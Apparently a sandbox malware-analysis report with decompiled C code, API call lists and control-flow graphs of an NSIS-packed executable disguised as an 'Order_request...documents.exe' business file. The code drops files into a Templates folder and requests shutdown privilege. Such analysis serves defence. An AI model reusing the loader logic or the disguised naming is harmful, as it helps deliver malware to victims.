                                                • GlobalReAlloc.KERNEL32 ref: 007E1583
                                                • GlobalLock.KERNEL32 ref: 007E1595
                                                • lstrcatW.KERNEL32(?,740976928), ref: 007E15A2
                                                • GlobalSize.KERNEL32(00000002), ref: 007E15B5
                                                • lstrlenW.KERNEL32(00000000), ref: 007E15D5
                                                • lstrcpyW.KERNEL32 ref: 007E15F9
                                                • CharNextW.USER32(?), ref: 007E1660
                                                • GetTickCount.KERNEL32 ref: 007E1692
                                                • TerminateProcess.KERNEL32(?,000000FF), ref: 007E16A6
                                                • lstrcpyW.KERNEL32 ref: 007E16B8
                                                • Sleep.KERNELBASE(00000064), ref: 007E16C2
                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 007E16CC
                                                • GetExitCodeProcess.KERNEL32 ref: 007E16DC
                                                • PeekNamedPipe.KERNELBASE(?,00000000,00000000,00000000,?,00000000), ref: 007E16ED
                                                • lstrcpyW.KERNEL32 ref: 007E1704
                                                • lstrcpyW.KERNEL32 ref: 007E1746
                                                • wsprintfW.USER32 ref: 007E1764
                                                • CloseHandle.KERNEL32(?,?), ref: 007E1782
                                                • CloseHandle.KERNEL32(?), ref: 007E1787
                                                • CloseHandle.KERNEL32(?), ref: 007E178C
                                                • CloseHandle.KERNEL32(?), ref: 007E1791
                                                • CloseHandle.KERNEL32(?), ref: 007E1796
                                                • CloseHandle.KERNEL32(?), ref: 007E179B
                                                • DeleteFileW.KERNEL32(?), ref: 007E17B4
                                                • GlobalFree.KERNEL32 ref: 007E17C3
                                                • GlobalUnlock.KERNEL32(00000001), ref: 007E17CD
                                                • GlobalFree.KERNEL32 ref: 007E17D6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.512316824.00000000007E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007E0000, based on PE: true
                                                • Associated: 00000000.00000002.512304950.00000000007E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512325440.00000000007E2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512337115.00000000007E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.512347213.00000000007E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7e0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Global$File$Handle$Close$Createlstrlen$AllocPipeProcesslstrcpy$CountFreeTick$CharDeleteDescriptorFindLockModuleNameNamedPeekSecuritySizeUnlockViewWindowlstrcat$AddressCodeCopyCurrentDaclExitInfoInitializeMappingNextObjectPrevProcReadSingleSleepStartupTempTerminateUnmapVersionWaitlstrcmpilstrcpynwsprintf
                                                • String ID: $ i)w$#32770$/OEM$/TIMEOUT=$740976928$740976928$D$SysListView32$error$timeout
                                                • API String ID: 4049317599-3140818848
                                                • Opcode ID: dd8dc74005539f45ff326b9b5ae81224afc8a80b01f2a373d9e6259edb25a643
                                                • Instruction ID: acccdbadb67ad22eb25ecc571869661f1ed02ba127e593541d64aa19a82bdead
                                                • Opcode Fuzzy Hash: dd8dc74005539f45ff326b9b5ae81224afc8a80b01f2a373d9e6259edb25a643
                                                • Instruction Fuzzy Hash: B422B371902289EFDB119FA5DC89AAEBBBDFF0C304F504069E505E71A1DB385E81CB64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040327D Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 401stringfilecomCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 115 40327d-4032af SetErrorMode GetVersion 116 4032b1-4032b9 call 406408 115->116 117 4032c2-403355 call 40639c * 3 call 406408 * 2 #17 OleInitialize SHGetFileInfoW call 406032 GetCommandLineW call 406032 GetModuleHandleW 115->117 116->117 122 4032bb 116->122 135 403357-40335e 117->135 136 40335f-403379 call 405a13 CharNextW 117->136 122->117 135->136 139 403491-4034ab GetTempPathW call 40324c 136->139 140 40337f-403385 136->140 147 403503-40351d DeleteFileW call 402dee 139->147 148 4034ad-4034cb GetWindowsDirectoryW lstrcatW call 40324c 139->148 141 403387-40338c 140->141 142 40338e-403394 140->142 141->141 141->142 145 403396-40339a 142->145 146 40339b-40339f 142->146 145->146 149 4033a5-4033ab 146->149 150 40345d-40346a call 405a13 146->150 168 403523-403529 147->168 169 4035ce-4035df call 4037a1 OleUninitialize 147->169 148->147 164 4034cd-4034fd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40324c 148->164 154 4033c5-4033fe 149->154 155 4033ad-4033b4 149->155 166 40346c-40346d 150->166 167 40346e-403474 150->167 161 403400-403405 154->161 162 40341b-403455 154->162 159 4033b6-4033b9 155->159 160 4033bb 155->160 159->154 159->160 160->154 161->162 163 403407-40340f 161->163 162->150 165 403457-40345b 162->165 171 403411-403414 163->171 172 403416 163->172 164->147 164->169 165->150 174 40347c-40348a call 406032 165->174 166->167 167->140 175 40347a 167->175 176 4035be-4035c5 call 40387b 168->176 177 40352f-40353a call 405a13 168->177 184 403705-40370b 169->184 185 4035e5-4035f5 call 405777 ExitProcess 169->185 171->162 171->172 172->162 180 40348f 174->180 175->180 187 4035ca 176->187 191 403588-403592 177->191 192 40353c-403571 177->192 180->139 189 403789-403791 184->189 190 40370d-403723 GetCurrentProcess OpenProcessToken 184->190 187->169 193 403793 189->193 194 403797-40379b ExitProcess 189->194 198 403725-403753 LookupPrivilegeValueW AdjustTokenPrivileges 190->198 199 403759-403767 call 406408 190->199 196 403594-4035a2 call 405aee 191->196 197 4035fb-40360f call 4056fa lstrcatW 191->197 200 403573-403577 192->200 193->194 196->169 210 4035a4-4035ba call 406032 * 2 196->210 211 403611-403617 lstrcatW 197->211 212 40361c-403636 lstrcatW lstrcmpiW 197->212 198->199 213 403775-403780 ExitWindowsEx 199->213 214 403769-403773 199->214 201 403580-403584 200->201 202 403579-40357e 200->202 201->200 206 403586 201->206 202->201 202->206 206->191 210->176 211->212 212->169 217 403638-40363b 212->217 213->189 215 403782-403784 call 40140b 213->215 214->213 214->215 215->189 220 403644 call 4056dd 217->220 221 40363d-403642 call 405660 217->221 226 403649-403657 SetCurrentDirectoryW 220->226 221->226 229 403664-40368d call 406032 226->229 230 403659-40365f call 406032 226->230 234 403692-4036ae call 406054 DeleteFileW 229->234 230->229 237 4036b0-4036c0 CopyFileW 234->237 238 4036ef-4036f7 234->238 237->238 240 4036c2-4036e2 call 405ed3 call 406054 call 405712 237->240 238->234 239 4036f9-403700 call 405ed3 238->239 239->169 240->238 249 4036e4-4036eb CloseHandle 240->249 249->238
                                                C-Code - Quality: 82%
                                                			_entry_() {
				struct _SHFILEINFOW _v716;
				int _v720;
				WCHAR* _v724;
				struct _TOKEN_PRIVILEGES _v732;
				signed int _v736;
				void* _v740;
				int _v744;
				WCHAR* _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				int _v764;
				void* _v772;
				intOrPtr _t53;
				WCHAR* _t57;
				char* _t60;
				void* _t63;
				void* _t65;
				intOrPtr _t67;
				signed int _t69;
				int _t72;
				intOrPtr* _t73;
				int _t74;
				int _t76;
				void* _t100;
				signed int _t117;
				void* _t120;
				void* _t125;
				intOrPtr _t144;
				intOrPtr _t145;
				intOrPtr* _t146;
				void* _t148;
				char* _t149;
				void* _t152;
				int _t153;
				signed int _t157;
				signed int _t162;
				signed int _t167;
				void* _t169;
				void* _t172;
				int* _t174;
				signed int _t180;
				signed int _t183;
				void* _t184;
				WCHAR* _t185;
				int _t191;
				signed int _t194;
				void* _t237;

				_t191 = 0;
				_t184 = 0x20;
				_v720 = 0;
				_v724 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v716.iIcon = 0;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t146 = E00406408(0);
					if(_t146 != 0) {
						 *_t146(0xc00);
					}
				}
				E0040639C("UXTHEME"); // executed
				E0040639C("USERENV"); // executed
				E0040639C("SETUPAPI"); // executed
				E00406408(9);
				_t53 = E00406408(7);
				 *0x7a8a44 = _t53;
				__imp__#17(_t169, _t148);
				__imp__OleInitialize(_t191); // executed
				 *0x7a8af8 = _t53;
				SHGetFileInfoW(0x79ff00, _t191,  &_v716, 0x2b4, _t191); // executed
				E00406032("Overcaustically Setup", L"NSIS Error");
				_t57 = GetCommandLineW();
				_t149 = L"\"C:\\Users\\frontdesk\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe\"";
				E00406032(_t149, _t57);
				 *0x7a8a40 = GetModuleHandleW(_t191);
				_t60 = _t149;
				if(L"\"C:\\Users\\frontdesk\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe\"" == 0x22) {
					_t60 =  &M007B3002;
					_t184 = 0x22;
				}
				_t153 = CharNextW(E00405A13(_t60, _t184));
				_v748 = _t153;
				_t63 =  *_t153;
				if(_t63 == _t191) {
					L28:
					_t185 = L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t185);
					_t65 = E0040324C(_t153, 0);
					_t219 = _t65;
					if(_t65 != 0) {
						L31:
						DeleteFileW(L"1033"); // executed
						_t67 = E00402DEE(_t221, _v736); // executed
						_v752 = _t67;
						if(_t67 != _t191) {
							L43:
							E004037A1();
							__imp__OleUninitialize();
							_t233 = _v748 - _t191;
							if(_v748 == _t191) {
								__eflags =  *0x7a8ad4 - _t191;
								if( *0x7a8ad4 == _t191) {
									L67:
									_t69 =  *0x7a8aec;
									__eflags = _t69 - 0xffffffff;
									if(_t69 != 0xffffffff) {
										_v744 = _t69;
									}
									ExitProcess(_v744);
								}
								_t72 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v740);
								__eflags = _t72;
								if(_t72 != 0) {
									LookupPrivilegeValueW(_t191, L"SeShutdownPrivilege",  &(_v732.Privileges));
									_v732.PrivilegeCount = 1;
									_v720 = 2;
									AdjustTokenPrivileges(_v740, _t191,  &_v732, _t191, _t191, _t191);
								}
								_t73 = E00406408(4);
								__eflags = _t73 - _t191;
								if(_t73 == _t191) {
									L65:
									_t74 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t74;
									if(_t74 != 0) {
										goto L67;
									}
									goto L66;
								} else {
									_t76 =  *_t73(_t191, _t191, _t191, 0x25, 0x80040002);
									__eflags = _t76;
									if(_t76 == 0) {
										L66:
										E0040140B(9);
										goto L67;
									}
									goto L65;
								}
							}
							E00405777(_v748, 0x200010);
							ExitProcess(2);
						}
						if( *0x7a8a5c == _t191) {
							L42:
							 *0x7a8aec =  *0x7a8aec | 0xffffffff;
							_v744 = E0040387B( *0x7a8aec);
							goto L43;
						}
						_t174 = E00405A13(_t149, _t191);
						if(_t174 < _t149) {
							L39:
							_t230 = _t174 - _t149;
							_v748 = L"Error launching installer";
							if(_t174 < _t149) {
								_t172 = E004056FA(_t233);
								lstrcatW(_t185, L"~nsu");
								if(_t172 != _t191) {
									lstrcatW(_t185, "A");
								}
								lstrcatW(_t185, L".tmp");
								_t151 = L"C:\\Users\\frontdesk\\Desktop";
								if(lstrcmpiW(_t185, L"C:\\Users\\frontdesk\\Desktop") != 0) {
									_push(_t185);
									if(_t172 == _t191) {
										E004056DD();
									} else {
										E00405660();
									}
									SetCurrentDirectoryW(_t185);
									_t237 = L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis" - _t191; // 0x43
									if(_t237 == 0) {
										E00406032(L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis", _t151);
									}
									E00406032(0x7a9000, _v740);
									_t154 = "A" & 0x0000ffff;
									 *0x7a9800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t152 = 0x1a;
									do {
										E00406054(_t152, 0x79f700, _t185, 0x79f700,  *((intOrPtr*)( *0x7a8a50 + 0x120)));
										DeleteFileW(0x79f700);
										if(_v756 != _t191 && CopyFileW(L"C:\\Users\\frontdesk\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", 0x79f700, 1) != 0) {
											E00405ED3(_t154, 0x79f700, _t191);
											E00406054(_t152, 0x79f700, _t185, 0x79f700,  *((intOrPtr*)( *0x7a8a50 + 0x124)));
											_t100 = E00405712(0x79f700);
											if(_t100 != _t191) {
												CloseHandle(_t100);
												_v748 = _t191;
											}
										}
										 *0x7a9800 =  *0x7a9800 + 1;
										_t152 = _t152 - 1;
									} while (_t152 != 0);
									E00405ED3(_t154, _t185, _t191);
								}
								goto L43;
							}
							 *_t174 = _t191;
							_t175 =  &(_t174[2]);
							if(E00405AEE(_t230,  &(_t174[2])) == 0) {
								goto L43;
							}
							E00406032(L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis", _t175);
							E00406032(L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis\\Grusendes\\Stoser\\Unappealingness\\Dermobranchiate", _t175);
							_v764 = _t191;
							goto L42;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t157 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t117 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t162 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t174 != _t157 || _t174[1] != _t117) {
							_t174 = _t174;
							if(_t174 >= _t149) {
								continue;
							}
							break;
						}
						_t191 = 0;
						goto L39;
					}
					GetWindowsDirectoryW(_t185, 0x3fb);
					lstrcatW(_t185, L"\\Temp");
					_t120 = E0040324C(_t153, _t219);
					_t220 = _t120;
					if(_t120 != 0) {
						goto L31;
					}
					GetTempPathW(0x3fc, _t185);
					lstrcatW(_t185, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t185);
					SetEnvironmentVariableW(L"TMP", _t185);
					_t125 = E0040324C(_t153, _t220);
					_t221 = _t125;
					if(_t125 == 0) {
						goto L43;
					}
					goto L31;
				} else {
					goto L6;
				}
				do {
					L6:
					_t162 = 0x20;
					if(_t63 != _t162) {
						L8:
						_t194 = _t162;
						if( *_t153 == 0x22) {
							_t153 = _t153 + 2;
							_t194 = 0x22;
						}
						if( *_t153 != 0x2f) {
							goto L22;
						} else {
							_t153 = _t153 + 2;
							if( *_t153 == 0x53) {
								_t145 =  *((intOrPtr*)(_t153 + 2));
								if(_t145 == _t162 || _t145 == 0) {
									 *0x7a8ae0 = 1;
								}
							}
							asm("cdq");
							asm("cdq");
							_t167 = L"NCRC" & 0x0000ffff;
							asm("cdq");
							_t180 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t167;
							if( *_t153 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t167) &&  *((intOrPtr*)(_t153 + 4)) == _t180) {
								_t144 =  *((intOrPtr*)(_t153 + 8));
								if(_t144 == 0x20 || _t144 == 0) {
									_v736 = _v736 | 0x00000004;
								}
							}
							asm("cdq");
							asm("cdq");
							_t162 = L" /D=" & 0x0000ffff;
							asm("cdq");
							_t183 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t162;
							if( *(_t153 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t162) ||  *_t153 != _t183) {
								goto L22;
							} else {
								 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
								__eflags = _t153;
								E00406032(L"C:\\Users\\frontdesk\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis", _t153);
								L27:
								_t191 = 0;
								goto L28;
							}
						}
					} else {
						goto L7;
					}
					do {
						L7:
						_t153 = _t153 + 2;
					} while ( *_t153 == _t162);
					goto L8;
					L22:
					_t153 = E00405A13(_t153, _t194);
					if( *_t153 == 0x22) {
						_t153 = _t153 + 2;
					}
					_t63 =  *_t153;
				} while (_t63 != 0);
				goto L27;
			}


















































                                                0x00403287
                                                0x00403289
                                                0x0040328a
                                                0x00403293
                                                0x0040329b
                                                0x0040329f
                                                0x004032af
                                                0x004032b2
                                                0x004032b9
                                                0x004032c0
                                                0x004032c0
                                                0x004032b9
                                                0x004032c9
                                                0x004032d3
                                                0x004032dd
                                                0x004032e4
                                                0x004032eb
                                                0x004032f0
                                                0x004032f5
                                                0x004032fc
                                                0x00403302
                                                0x00403318
                                                0x00403328
                                                0x0040332d
                                                0x00403333
                                                0x0040333a
                                                0x0040334e
                                                0x00403353
                                                0x00403355
                                                0x00403359
                                                0x0040335e
                                                0x0040335e
                                                0x0040336d
                                                0x0040336f
                                                0x00403373
                                                0x00403379
                                                0x00403491
                                                0x00403497
                                                0x004034a2
                                                0x004034a4
                                                0x004034a9
                                                0x004034ab
                                                0x00403503
                                                0x00403508
                                                0x00403512
                                                0x00403519
                                                0x0040351d
                                                0x004035ce
                                                0x004035ce
                                                0x004035d3
                                                0x004035d9
                                                0x004035df
                                                0x00403705
                                                0x0040370b
                                                0x00403789
                                                0x00403789
                                                0x0040378e
                                                0x00403791
                                                0x00403793
                                                0x00403793
                                                0x0040379b
                                                0x0040379b
                                                0x0040371b
                                                0x00403721
                                                0x00403723
                                                0x00403730
                                                0x00403743
                                                0x0040374b
                                                0x00403753
                                                0x00403753
                                                0x0040375b
                                                0x00403760
                                                0x00403767
                                                0x00403775
                                                0x00403778
                                                0x0040377e
                                                0x00403780
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403769
                                                0x0040376f
                                                0x00403771
                                                0x00403773
                                                0x00403782
                                                0x00403784
                                                0x00000000
                                                0x00403784
                                                0x00000000
                                                0x00403773
                                                0x00403767
                                                0x004035ee
                                                0x004035f5
                                                0x004035f5
                                                0x00403529
                                                0x004035be
                                                0x004035be
                                                0x004035ca
                                                0x00000000
                                                0x004035ca
                                                0x00403536
                                                0x0040353a
                                                0x00403588
                                                0x00403588
                                                0x0040358a
                                                0x00403592
                                                0x00403606
                                                0x00403608
                                                0x0040360f
                                                0x00403617
                                                0x00403617
                                                0x00403622
                                                0x00403627
                                                0x00403636
                                                0x0040363a
                                                0x0040363b
                                                0x00403644
                                                0x0040363d
                                                0x0040363d
                                                0x0040363d
                                                0x0040364a
                                                0x00403650
                                                0x00403657
                                                0x0040365f
                                                0x0040365f
                                                0x0040366d
                                                0x00403679
                                                0x00403687
                                                0x0040368c
                                                0x00403692
                                                0x0040369e
                                                0x004036a4
                                                0x004036ae
                                                0x004036c4
                                                0x004036d5
                                                0x004036db
                                                0x004036e2
                                                0x004036e5
                                                0x004036eb
                                                0x004036eb
                                                0x004036e2
                                                0x004036ef
                                                0x004036f6
                                                0x004036f6
                                                0x004036fb
                                                0x004036fb
                                                0x00000000
                                                0x00403636
                                                0x00403594
                                                0x00403597
                                                0x004035a2
                                                0x00000000
                                                0x00000000
                                                0x004035aa
                                                0x004035b5
                                                0x004035ba
                                                0x00000000
                                                0x004035ba
                                                0x00403543
                                                0x0040355b
                                                0x0040356c
                                                0x0040356d
                                                0x00403571
                                                0x00403573
                                                0x00403581
                                                0x00403584
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403584
                                                0x00403586
                                                0x00000000
                                                0x00403586
                                                0x004034b3
                                                0x004034bf
                                                0x004034c4
                                                0x004034c9
                                                0x004034cb
                                                0x00000000
                                                0x00000000
                                                0x004034d3
                                                0x004034db
                                                0x004034ec
                                                0x004034f4
                                                0x004034f6
                                                0x004034fb
                                                0x004034fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040337f
                                                0x0040337f
                                                0x00403381
                                                0x00403385
                                                0x0040338e
                                                0x00403392
                                                0x00403394
                                                0x00403399
                                                0x0040339a
                                                0x0040339a
                                                0x0040339f
                                                0x00000000
                                                0x004033a5
                                                0x004033a6
                                                0x004033ab
                                                0x004033ad
                                                0x004033b4
                                                0x004033bb
                                                0x004033bb
                                                0x004033b4
                                                0x004033cc
                                                0x004033df
                                                0x004033e0
                                                0x004033f5
                                                0x004033fa
                                                0x004033fe
                                                0x00403407
                                                0x0040340f
                                                0x00403416
                                                0x00403416
                                                0x0040340f
                                                0x00403422
                                                0x00403435
                                                0x00403436
                                                0x0040344b
                                                0x00403451
                                                0x00403455
                                                0x00000000
                                                0x0040347c
                                                0x0040347c
                                                0x00403481
                                                0x0040348a
                                                0x0040348f
                                                0x0040348f
                                                0x00000000
                                                0x0040348f
                                                0x00403455
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403387
                                                0x00403387
                                                0x00403388
                                                0x00403389
                                                0x00000000
                                                0x0040345d
                                                0x00403464
                                                0x0040346a
                                                0x0040346d
                                                0x0040346d
                                                0x0040346e
                                                0x00403471
                                                0x00000000

                                                APIs
                                                • SetErrorMode.KERNELBASE ref: 0040329F
                                                • GetVersion.KERNEL32 ref: 004032A5
                                                • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004032F5
                                                • OleInitialize.OLE32(00000000), ref: 004032FC
                                                • SHGetFileInfoW.SHELL32(0079FF00,00000000,?,000002B4,00000000), ref: 00403318
                                                • GetCommandLineW.KERNEL32(Overcaustically Setup,NSIS Error), ref: 0040332D
                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",00000000), ref: 00403340
                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",00000020), ref: 00403367
                                                  • Part of subcall function 00406408: GetModuleHandleA.KERNEL32(?,?,00000020,004032E9,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040641A
                                                  • Part of subcall function 00406408: GetProcAddress.KERNEL32(00000000,?), ref: 00406435
                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\), ref: 004034A2
                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 004034B3
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004034BF
                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 004034D3
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004034DB
                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 004034EC
                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 004034F4
                                                • DeleteFileW.KERNELBASE(1033), ref: 00403508
                                                  • Part of subcall function 00406032: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,0040332D,Overcaustically Setup,NSIS Error), ref: 0040603F
                                                • OleUninitialize.OLE32(?), ref: 004035D3
                                                • ExitProcess.KERNEL32 ref: 004035F5
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu), ref: 00403608
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,0040A26C), ref: 00403617
                                                • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,.tmp), ref: 00403622
                                                • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,.tmp,C:\Users\user~1\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",00000000,?), ref: 0040362E
                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\), ref: 0040364A
                                                • DeleteFileW.KERNEL32(0079F700,0079F700,?,007A9000,?), ref: 004036A4
                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,0079F700,00000001), ref: 004036B8
                                                • CloseHandle.KERNEL32(00000000,0079F700,0079F700,?,0079F700,00000000), ref: 004036E5
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403714
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040371B
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403730
                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403753
                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403778
                                                • ExitProcess.KERNEL32 ref: 0040379B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                • String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis\Grusendes\Stoser\Unappealingness\Dermobranchiate$C:\Users\user\Desktop$C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe$Error launching installer$Low$NSIS Error$Overcaustically Setup$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                • API String ID: 3586999533-572620719
                                                • Opcode ID: 55e1c2b6fe71988611f999325c05d3c9627bfef59b93c94f4dc9f559726788cb
                                                • Instruction ID: 4150c076459d7de682cc7567c7be7d1922bd71d2f30956bacb70bd1bfbc75f2d
                                                • Opcode Fuzzy Hash: 55e1c2b6fe71988611f999325c05d3c9627bfef59b93c94f4dc9f559726788cb
                                                • Instruction Fuzzy Hash: A1D10770240310ABD710BF659D45B2B3AADEB81746F11843FF581B62D2DF7D8A418B6E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004052D0 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 250 4052d0-4052eb 251 4052f1-4053b8 GetDlgItem * 3 call 40412b call 404a2e GetClientRect GetSystemMetrics SendMessageW * 2 250->251 252 40547a-405481 250->252 270 4053d6-4053d9 251->270 271 4053ba-4053d4 SendMessageW * 2 251->271 254 405483-4054a5 GetDlgItem CreateThread FindCloseChangeNotification 252->254 255 4054ab-4054b8 252->255 254->255 256 4054d6-4054e0 255->256 257 4054ba-4054c0 255->257 261 4054e2-4054e8 256->261 262 405536-40553a 256->262 259 4054c2-4054d1 ShowWindow * 2 call 40412b 257->259 260 4054fb-405504 call 40415d 257->260 259->256 274 405509-40550d 260->274 266 405510-405520 ShowWindow 261->266 267 4054ea-4054f6 call 4040cf 261->267 262->260 264 40553c-405542 262->264 264->260 272 405544-405557 SendMessageW 264->272 275 405530-405531 call 4040cf 266->275 276 405522-40552b call 405191 266->276 267->260 277 4053e9-405400 call 4040f6 270->277 278 4053db-4053e7 SendMessageW 270->278 271->270 279 405659-40565b 272->279 280 40555d-405588 CreatePopupMenu call 406054 AppendMenuW 272->280 275->262 276->275 289 405402-405416 ShowWindow 277->289 290 405436-405457 GetDlgItem SendMessageW 277->290 278->277 279->274 287 40558a-40559a GetWindowRect 280->287 288 40559d-4055b2 TrackPopupMenu 280->288 287->288 288->279 291 4055b8-4055cf 288->291 292 405425 289->292 293 405418-405423 ShowWindow 289->293 290->279 294 40545d-405475 SendMessageW * 2 290->294 295 4055d4-4055ef SendMessageW 291->295 